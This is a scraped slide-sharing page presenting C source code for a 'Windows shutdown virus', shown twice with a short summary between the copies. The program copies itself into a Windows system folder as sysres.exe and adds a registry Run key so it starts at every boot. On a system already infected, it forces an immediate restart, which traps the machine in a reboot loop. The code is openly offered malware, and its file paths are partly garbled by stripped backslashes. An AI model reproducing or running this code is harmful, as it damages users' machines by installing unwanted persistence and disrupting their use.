Downloaded 20 times
![#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:windowssystem“,&ffblk,FA_DIREC); //to determine the root
drive
if(done==0)
{
done=findfirst(“C:windowssystemsysres.exe“,&ffblk,0); //to determine
whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:windowssystem“,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:windowssystemsysres.exe“,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:windowssystem“,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:windowssystemsysres.exe“,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:windowssystem“,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:windowssystemsysres.exe“,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();](https://image.slidesharecdn.com/windowsshutdownvirussourcecodec-130818215612-phpapp01/85/Windows-shutdown-virus-source-code-c-1-320.jpg)
![if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open”s itself
switch(drive_no)
{
case 1:
target=fopen(”C:windowssystemsysres.exe”,”wb”); //to place a copy of
itself in a remote place
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
C:windowssystem sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:windowssystemsysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
D:windowssystemsysres.exe”);
break;
case 3:
target=fopen(”E:windowssystemsysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
E:windowssystemsysres.exe”);
break;
case 4:
target=fopen(”F:windowssystemsysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
F:windowssystemsysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0?); //if the system is already infected then just give a
command to restart
}](https://image.slidesharecdn.com/windowsshutdownvirussourcecodec-130818215612-phpapp01/85/Windows-shutdown-virus-source-code-c-2-320.jpg)
Uploaded byAndi Master Hiyperterminal
Windows shutdown virus source code c++
This C code defines functions to check if a computer system is already infected by a virus by looking for a file called "sysres.exe" on drives C, D, E, and F. If the file is not found, the virus file will copy itself to "sysres.exe" on one of the drives and add it to the registry run key so that it executes on startup. If the system is already infected, it will just restart the computer.
More Related Content
![C99[2]](https://cdn.slidesharecdn.com/ss_thumbnails/c992-100302130206-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
Similar to Windows shutdown virus source code c++
![[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis](https://cdn.slidesharecdn.com/ss_thumbnails/20071stcodeengnseaofglasslinuxvirusanalysis-130527105858-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
Windows shutdown virus source code c++
- 1. #include<stdio.h> #include<dos.h> #include<dir.h> int found,drive_no;charbuff[128]; void findroot() { int done; struct ffblk ffblk; //File block structure done=findfirst(“C:windowssystem“,&ffblk,FA_DIREC); //to determine the root drive if(done==0) { done=findfirst(“C:windowssystemsysres.exe“,&ffblk,0); //to determine whether the virus is already installed or not if(done==0) { found=1; //means that the system is already infected return; } drive_no=1; return; } done=findfirst(“D:windowssystem“,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“D:windowssystemsysres.exe“,&ffblk,0); if (done==0) { found=1;return; } drive_no=2; return; } done=findfirst(“E:windowssystem“,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“E:windowssystemsysres.exe“,&ffblk,0); if(done==0) { found=1; return; } drive_no=3; return; } done=findfirst(“F:windowssystem“,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“F:windowssystemsysres.exe“,&ffblk,0); if(done==0) { found=1; return; } drive_no=4; return; } else exit(0); } void main() { FILE *self,*target; findroot();
- 2. if(found==0) //if thesystem is not already infected { self=fopen(_argv[0],”rb”); //The virus file open”s itself switch(drive_no) { case 1: target=fopen(”C:windowssystemsysres.exe”,”wb”); //to place a copy of itself in a remote place system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d C:windowssystem sysres.exe”); //put this file to registry for starup break; case 2: target=fopen(”D:windowssystemsysres.exe”,”wb”); system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d D:windowssystemsysres.exe”); break; case 3: target=fopen(”E:windowssystemsysres.exe”,”wb”); system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d E:windowssystemsysres.exe”); break; case 4: target=fopen(”F:windowssystemsysres.exe”,”wb”); system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d F:windowssystemsysres.exe”); break; default: exit(0); } while(fread(buff,1,1,self)>0) fwrite(buff,1,1,target); fcloseall(); } else system(”shutdown -r -t 0?); //if the system is already infected then just give a command to restart }